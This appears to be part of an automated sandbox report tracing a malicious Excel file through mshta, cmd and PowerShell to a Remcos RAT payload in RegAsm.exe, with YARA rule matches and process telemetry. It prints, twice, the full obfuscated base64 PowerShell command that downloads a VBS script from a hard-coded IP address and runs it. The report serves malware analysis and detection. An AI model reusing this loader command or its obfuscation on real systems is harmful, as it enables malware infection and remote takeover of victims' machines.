                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0043E5A828_2_0043E5A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_004387F028_2_004387F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0043797E28_2_0043797E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_004339D728_2_004339D7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0044DA4928_2_0044DA49
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00427AD728_2_00427AD7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0041DBF328_2_0041DBF3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00427C4028_2_00427C40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00437DB328_2_00437DB3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00435EEB28_2_00435EEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0043DEED28_2_0043DEED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00426E9F28_2_00426E9F
                  Source: PO_304234.xlsOLE indicator, VBA macros: true
                  Source: PO_304234.xlsStream path 'MBD0032CD06/\x1Ole' : https://zhort.de/pitashimmKHi"RSk)JKAJw`7Y\xM\gl7-g8C1?L,<iS:W]!7hFv;"o[^y.!2J+~JIKs7i 4m\RX6p@*"h&i ~8buVFfA6ktJ4svpq2nujS99XQ6Ih8JJ4CiXMxIKrCZYmeI8AyGiYK0vkrKRt9Yhj0D6F70pPb,4[YNv(%Gw6
                  Source: A7130000.0.drStream path 'MBD0032CD06/\x1Ole' : https://zhort.de/pitashimmKHi"RSk)JKAJw`7Y\xM\gl7-g8C1?L,<iS:W]!7hFv;"o[^y.!2J+~JIKs7i 4m\RX6p@*"h&i ~8buVFfA6ktJ4svpq2nujS99XQ6Ih8JJ4CiXMxIKrCZYmeI8AyGiYK0vkrKRt9Yhj0D6F70pPb,4[YNv(%Gw6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402093 appears 50 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00401E65 appears 34 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434E70 appears 54 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434801 appears 41 times
                  Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                  Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                  Source: 28.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 28.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 28.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 28.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 28.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 28.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 14.2.powershell.exe.133a4b98.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 14.2.powershell.exe.133a4b98.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 14.2.powershell.exe.133a4b98.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 14.2.powershell.exe.133a4b98.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 14.2.powershell.exe.133a4b98.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 14.2.powershell.exe.133a4b98.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 0000000E.00000002.443270991.0000000012F3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 3180, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 2848, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 2848, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: Process Memory Space: powershell.exe PID: 2848, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 3788, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 4016, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: Process Memory Space: powershell.exe PID: 4016, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: RegAsm.exe PID: 4092, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLS@35/38@7/5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,28_2_0041798D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,28_2_0040F4AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,28_2_0041B539
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,28_2_0041AADB
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\A7130000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-CJ3HJ1
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR7E05.tmpJump to behavior
                  Source: PO_304234.xlsOLE indicator, Workbook stream: true
                  Source: A7130000.0.drOLE indicator, Workbook stream: true
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................m.......m.....}..w.............................1......(.P..............3.......................=m.............Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................T]]k....}..w.....=m.....\.......................(.P.....8.......@.......................................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................=m.....}..w............@#c......Z]k....@.b.....(.P.....8.......@.......................................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................T]]k....}..w.....=m.....\.......................(.P.....8.......@.......................................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................=m.....}..w............@#c......Z]k....@.b.....(.P.....8.......@.......................................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.....H.......N.......................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.@#c......Z]k....@.b.....(.P.....8.......@.......H....... .......................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................=m.....}..w............@#c......Z]k....@.b.....(.P.....8.......@.......................................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.8.......@.......H.......@.......................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................=m.....}..w............@#c......Z]k....@.b.....(.P.....8.......@.......................................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...H.......N.......................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................=m.....}..w............@#c......Z]k....@.b.....(.P.....8.......@...............l.......................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ........=m.....}..w............@#c......Z]k....@.b.....(.P.....8.......@.......H...............................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................=m.............0..../...Wl.....}..w............@E......^...............(.P.....8.......@.......h...............................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................=m................../...Wl.....}..w............@E......^...............(.P.....8.......@.......h...............................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...m.....}..w.............................1......(.P..............3.......................=..............Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................m.....}..w......m......................1......(.P.....|...............................................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................m.......m.....}..w.............................1......(.P..............3......................................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm........................Tk....}..w............\.......................(.P.....d.......|.......................................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w..............[.......Tk............(.P.....d.......|.......................................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm........................Tk....}..w............\.......................(.P.....d.......|.......................................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w..............[.......Tk............(.P.....d.......|.......................................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1...[.......Tk............(.P.....d.......|............... .......................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w..............[.......Tk............(.P.....d.......|.......................................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.d.......|...............@.......................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w..............[.......Tk............(.P.....d.......|.......................................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...........N.......................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w..............[.......Tk............(.P.....d.......|...............l.......................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ...............}..w..............[.......Tk............(.P.....d.......|.......................................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................0........Wl.....}..w............@E......^...............(.P.....d.......|.......(...............................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................Wl.....}..w............@E......^...............(.P.....d.......|.......(...............................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...m.....}..w.............................1......(.P..............3......8...............................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................m.....}..w......m......................1......(.P.....................8...............................
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                  Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: PO_304234.xlsVirustotal: Detection: 19%
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES89F7.tmp" "c:\Users\user\AppData\Local\Temp\imlwlgjg\CSCE8D62BF91CF49AAAEBCC2A37BB3C45C.TMP"
